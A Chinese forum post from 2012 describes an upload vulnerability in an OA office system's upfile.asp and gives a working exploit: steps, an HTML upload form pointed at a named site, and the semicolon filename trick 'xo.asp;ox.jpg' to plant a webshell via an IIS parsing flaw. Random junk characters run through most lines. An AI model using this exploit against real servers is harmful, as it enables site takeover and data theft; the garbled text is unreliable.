全能OA办公系统 上传漏洞
9 s; A8 t7 ]2 H. I i1 L! F' G/ ^) X3 [
系统介绍: H8 B2 l& i/ \5 L9 n: S6 Y8 |: P
0 o. B6 k- n2 P" [: e: b全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。! M- x( H5 O: A; E" f
; Q3 m+ o5 Z" y8 O: W. ~0 p主要功能:
. L% p1 \ P) x/ n. m$ B: K公司通告 " K+ a. j; L. N0 L- U- D
工作计划 + ~; O% U3 M7 N9 a2 Z3 Z
通讯助理 ; R/ h( m5 n4 Y0 d4 N
客户资源
$ _2 q$ g; S' W4 ~- K我的公文
/ F8 ?: V8 K6 {公文传阅
$ b5 R: s+ k7 i+ e8 C) \, X1 h: m公共资源
( Z0 k& B9 x1 i) j9 Q+ s资源预约 4 @( ?! j8 K2 [1 x7 m. X1 `; n
今日考勤 " @: h5 p* \+ X `% W
个人计划 0 S) T: h2 o2 T7 P Y" {* e
个人通讯录 2 S5 C1 y5 l5 A7 e0 E4 W; L" x7 Q6 n
个人基本档案
" j# G% a( n/ a: F& T; U未读邮件 / l/ V$ a$ E8 `6 R( X5 p w% b
发邮件 @+ A# W7 H* h4 O9 R4 V
收件夹
3 n: K! g6 [: a4 q/ l B# h E0 ?寄件夹
( `; e+ R* s$ |) e2 _6 @- i9 m网络硬盘 , B& s/ g8 m; Q; i" n+ c
网络会议
( }! C8 W/ |$ t$ I, a- j6 g' @& n* e网络调查
, k. s4 I' n: f8 G交流论坛) C6 m2 s; e! G( t8 o. A
; Q9 b, x) C% q% ?) j2 q9 W有兴趣测试的朋友可以下源码看看+ c0 R7 e% _9 ], u7 a
& A8 Q9 ?- R# ^; M
源码下载:
" {/ v! X2 X0 N3 B8 W+ f# P' P0 J' E* [
http://www.mycodes.net/30/4750.htm
3 s8 f- x3 c7 X4 j9 [5 W
2 L' g+ j. Q8 R( g' E0 u8 ^漏洞介绍:9 f* L9 y: c; v% n) D
1 k. ^9 m* P. P3 ] t由upfile.asp上传文件漏洞引起
7 ^. L( F, I) j2 e
$ ^4 t2 e- x% B( P4 }测试方法:% ]) [- G9 |* V( x5 e
. f6 n) Y) } J5 J( S6 z, B使用名小子上传http://www.itlynn.com/upfile.asp即可: A' p0 p- [5 [, A7 a% \7 g; `. s
. E: D: c+ K" ]* D如果upfile.asp文件被删除不存在。* I5 Y/ E' u7 r+ L) B
$ |% K3 r, C! Q1 b P- f
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
- e/ z/ d' T9 s
. X& `' R3 Y( @' M+ B& @9 z如果存在那么将如下代码保存为upfile.html。5 M6 B9 E+ J! [) Q* z( x
1 h& y- H9 p# U1 l
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
0 K7 G- f. |1 ^% B, B8 X+ S) A& F
, p( |0 `) L4 e2 S8 p) J
4 p, Z& y1 {3 a2 J) I" A1 e# ~$ H* `4 M7 {- g
01 <table border='0' align="center" cellpadding="5">
: R- Y4 t( p5 w2 X# d0 w( {& `4 m Z' |" U
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
/ V# Z7 O. H3 T6 m4 R' c5 l/ A$ T' W! j* B" D
03 <tr> * y( j0 C* L+ E, G6 ]
) j7 A! `: R( N6 _4 D
04 <td>报错:</td> $ ]" A/ p2 X3 ]0 Y! p
4 d3 ?( Q& V1 i4 L05 <td><input type='radio' name='errnumber' value='0'>
5 s( d, I8 f3 Q9 I( E) D$ B/ O# M& ?6 p+ W6 J7 e) y
06 自动更名 2 ^5 r$ v) c! T
, y d" B1 Q$ H
07 <input type='radio' name='errnumber' value='1' checked> 2 o1 A. \# l9 c8 V9 v
3 w; m Y& A8 N) @8 f" ]4 T
08 报错方式
: T- A# R2 X; d2 Q9 n7 k
9 {7 F, q7 S1 a3 j* c, K09 <input type='radio' name='errnumber' value='2'> ( C6 s% k; y S! I d6 l
* U0 o8 L; v1 p8 O/ M$ ^6 l10 直接覆盖</td>
/ C0 ]# n0 k9 F2 F
4 g" p' z* O8 ^; Z+ N5 h& e11 </tr>
9 }; r! y/ B5 p/ z2 O O' \# ]1 z" {6 X) b' C7 g
12 <tr> 8 F6 i: K* S+ B7 i
/ t" k" [- ?2 o0 p
13 <td>主题:</td>
4 u" D+ x! Y6 C9 ?3 y7 b/ v, m y' A' C* i5 K6 V6 u/ L
14 <td><input type='text' name='filename' size='30'></td>
" p7 _1 V' N: e' V5 {
# `; @) u" z! R. W6 ]# L15 </tr> . N2 g; q0 S9 y
9 x5 G4 `2 F% F7 V8 ]! O2 z' c& a7 ~
16 <tr>
# @! M: B$ w% |; K% }& R* J0 ]; i0 J3 L# W
17 <td>文件:</td> & @1 m. g2 Y) e- z- T% B
/ @0 w* o# s- `; F
18 <td><input type="file"name="fruit"size="30"></td> 3 V5 v1 z8 S5 B% a% V3 O
. G0 Z) g( s( ]19 </tr> $ B- x8 M* G, E8 C! _% m1 D
5 P; z$ W+ C, a; X20 <tr> 1 d$ e2 A1 X0 w" t
& T: t! V; O# a, f. |) ?6 @21 <td valign='top'>简介:</td>
7 N' n1 V. i# t! y5 t
. } o" f8 X# W8 K" Q% J( G1 C. ]22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> ' N( R3 M! D; e; ~2 C, s
/ Z) J% w5 v% X4 L7 n
23 </tr> # N. i% n/ J- }4 J
$ }' N. T# H& ~8 i6 e5 D
24 : N9 s- ^4 M4 f; w; C
: P5 ?+ B, a0 l1 _% l9 ?- l25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 9 O5 b7 \8 Z0 Z
8 w/ s% }4 L: z0 l$ t- e- @8 M26 </tr> ! }$ ]" R5 s; ?3 p/ r+ w% d6 ]
+ S! l0 Y4 }1 W1 N) _8 W. h1 `9 Y27 </form>
$ P; S: h/ M) T3 ~5 H
6 j6 G1 k& A) C9 S; K5 M然后打开上传一个文件名为xo.asp;ox.jpg的文件。5 o, g8 w) d0 i# o4 Y
$ V. w8 }1 q! B* x- v( ] ) V! ^" L$ ]+ Q* e
; L# F+ A+ Z" |6 C3 F上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
S; }% n7 x) N4 a8 W/ E
: D& o0 q" Q% T( K ?% U6 B8 ?此漏洞需要配合解析漏洞利用。
8 T* a$ d5 q3 ~1 r6 \+ z( j, N' s& F5 ^* F
|
发表于 2012-11-21 13:45:12
收藏
支持
反对